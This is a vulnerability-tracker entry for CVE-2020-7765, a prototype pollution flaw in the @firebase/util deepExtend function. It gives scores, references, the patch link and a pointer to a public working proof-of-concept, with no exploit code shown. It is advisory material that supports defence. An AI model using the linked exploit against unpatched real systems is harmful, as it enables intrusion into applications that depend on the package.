CVE-2020-7765

MEDIUM

@firebase/util <0.3.4 - Code Injection

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2020-7765. PoCs published by AikidoSec.

AI-analyzed exploit summary This repository contains a functional proof-of-concept for CVE-2020-7765, demonstrating prototype pollution in the `@firebase/util` package via the `deepExtend` function. The PoC includes both vulnerable and protected test cases, showcasing the exploit and mitigation.

Description

This affects the package @firebase/util before 0.3.4. This vulnerability relates to the deepExtend function within the DeepCopy.ts file. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.

Exploits (1)

github WORKING POC 6 stars
by AikidoSec · javascriptpoc
https://github.com/AikidoSec/zen-0-days/tree/main/node/CVE-2020-7765

This repository contains a functional proof-of-concept for CVE-2020-7765, demonstrating prototype pollution in the `@firebase/util` package via the `deepExtend` function. The PoC includes both vulnerable and protected test cases, showcasing the exploit and mitigation.

Classification
Working Poc 95%
Attack Type
Other
Complexity
Trivial
Reliability
Reliable
Target: @firebase/util (versions affected by CVE-2020-7765)
No auth needed
Prerequisites: Node.js environment · @firebase/util package
devstral-2 · analyzed Feb 27, 2026 Full analysis →

References (3)

Core 3
Core References
Exploit, Third Party Advisory x_refsource_misc
https://snyk.io/vuln/SNYK-JS-FIREBASEUTIL-1038324
Patch, Third Party Advisory x_refsource_misc
https://github.com/firebase/firebase-js-sdk/pull/4001

Scores

CVSS v3 5.6
EPSS 0.0056
EPSS Percentile 42.3%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Details

Status published
Products (2)
firebase/util 0 - 0.3.4npm
google/firebase\/util < 0.3.4
Published Nov 16, 2020
Tracked Since Feb 18, 2026